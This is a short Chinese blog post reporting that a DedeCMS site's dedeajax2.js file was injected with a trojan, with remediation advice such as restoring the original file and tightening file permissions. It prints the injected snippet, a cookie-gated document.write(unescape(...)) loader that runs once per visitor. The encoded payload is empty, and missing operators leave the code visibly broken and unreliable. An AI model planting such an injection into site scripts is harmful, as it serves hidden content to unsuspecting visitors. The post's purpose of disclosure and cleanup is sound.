这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:
//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。
不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。
关键字描述:木马 obj " if new // null var dede 植入